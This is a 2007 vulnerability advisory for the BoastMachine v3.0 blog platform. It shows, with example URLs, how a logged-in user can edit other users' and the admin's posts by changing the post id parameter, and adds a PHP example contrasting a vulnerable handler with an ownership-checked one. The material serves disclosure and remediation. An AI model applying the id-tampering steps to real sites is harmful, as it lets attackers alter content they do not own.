BoastMachine v3.0 platinum - Session ID Hacking, security hole with ID interchangeability in URL, admin topic affected by user change
`Vagrant - E-hack.org (05.22.2007)
BoastMachine v3.0 platinum - Session ID Hacking
After logging in to a site that allows new user registration, the data a site
user enters to edit a topic can be changed by another user. This is a security
hole caused by ID interchangeability in the URL address.
If the changed topic belongs to the admin, it doesn't affect the free login,
and the site user has the authority to make changes and copy the topics.
------- >>>
Vulnerable;
http://www.xxx.com/login.php
http://www.xxx.com/user.php?action=list_posts
Edit posts;
http://www.e-hack.org/user.php?action=list_posts
Post title edit;
http://www.xxx.com/user.php?action=edit_post&blog=1&id=(155) = (ID)
New ID;
http://www.xxx.com/user.php?action=edit_post&blog=1&id=(154) = (ID)
Credits : Vagrant
Contact : [email protected]
Site : www.e-hack.org
`
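The missing check behind this report is an ownership test on the `id` parameter of `edit_post`. The sketch below is an added example, not BoastMachine's own code: the function names, the session keys (`user_id`, `is_admin`) and the in-memory post table are assumptions, and the sample data is constructed to mirror the 155/154 case above.

```php
<?php
declare(strict_types=1);

// Constructed sample data: post 154 belongs to the admin (user 1),
// post 155 to a regular registered user (user 7).
$posts = [
    154 => ['blog' => 1, 'author_id' => 1, 'title' => 'Admin announcement'],
    155 => ['blog' => 1, 'author_id' => 7, 'title' => 'My first post'],
];

// Pattern matching the report: any logged-in user can edit whatever id the URL names.
function edit_post_vulnerable(array &$posts, array $session, array $get, string $newTitle): bool
{
    $id = (int)($get['id'] ?? 0);
    if (!isset($session['user_id']) || !isset($posts[$id])) {
        return false;
    }
    $posts[$id]['title'] = $newTitle; // no ownership check
    return true;
}

// Hardened: ids must be integers, the post must sit in the requested blog,
// and the session user must be its author (or an admin).
function edit_post_checked(array &$posts, array $session, array $get, string $newTitle): bool
{
    $id   = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT);
    $blog = filter_var($get['blog'] ?? null, FILTER_VALIDATE_INT);
    if (!isset($session['user_id']) || $id === false || $blog === false || !isset($posts[$id])) {
        return false;
    }
    $post    = $posts[$id];
    $isOwner = $post['author_id'] === $session['user_id'];
    $isAdmin = ($session['is_admin'] ?? false) === true;
    if ($post['blog'] !== $blog || !($isOwner || $isAdmin)) {
        return false; // same result as "not found", so valid ids are not revealed
    }
    $posts[$id]['title'] = $newTitle;
    return true;
}

// Regular user 7 requests the admin's post id instead of their own.
$session = ['user_id' => 7, 'is_admin' => false];
$request = ['action' => 'edit_post', 'blog' => '1', 'id' => '154'];

$a = $posts; // separate copies so each handler starts from the same state
$b = $posts;
var_dump(edit_post_vulnerable($a, $session, $request, 'changed'));
var_dump(edit_post_checked($b, $session, $request, 'changed'));
var_dump(edit_post_checked($b, $session, ['blog' => '1', 'id' => '155'], 'My edited post'));
```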